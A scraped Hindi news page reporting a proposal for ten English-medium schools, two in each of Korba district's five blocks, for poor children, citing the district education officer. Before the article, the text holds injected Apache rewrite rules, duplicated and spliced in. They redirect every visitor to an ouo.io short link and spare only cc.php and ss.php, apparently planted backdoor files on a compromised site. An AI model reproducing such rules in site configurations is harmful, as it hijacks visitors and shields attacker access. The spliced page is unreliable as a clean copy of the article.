
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 382
Previous Nextकोरबा। छत्तीसगढ़ के कोरबा जिले में गरीब बच्चों का इंग्लिश मीडियम स्कूल में पढ़ने का सपना अब जल्द ही पूरा होने वाला है। आपको बता दें कि कोरबा जिले के पांचों ब्लॉक में इंग्लिश मीडियम स्कूल खोलने की कवायद शुरू हो गई है। शासन के निर्देशानुसार हर ब्लॉक में दो इंग्लिश मीडियम स्कूल का खुलेंगे। लिहाजा, इस संबंध में जिला शिक्षा विभाग ने शासन को प्रस्ताव भेज दिया है। इसकी स्वीकृति मिलते ही स्कूल का संचालन पांचों ब्लॉक में शुरू कर दिया जाएगा। इसके बाद शासन की इस कवायद का लाभ गरीब तबके के बच्चों को आसानी से मिल सकेगा। इंग्लिश मीडियम स्कूल खुलने को लेकर गरीब बच्चों और अभिभावकों में खुश की लहर है। मामले में कोरबा जिला शिक्षा अधिकारी डी. के. कौशिक ने बताया कि जिले में हर ब्लॉक से दो-दो स्कूलों को इंग्लिश मीडियम में संचालित करने का प्रस्ताव शासन को भेजा गया है। उन्होंने कहा कि इसमें हर विकासखंड से एक प्राथमिक शाला और एक माध्यमिक शाला खोलने का प्रस्ताव शिक्षा विभाग की ओर से शासन को भेजा गया है। इस तरह कुल 10 स्कूलों का प्रस्ताव शासन को भेजा गया है।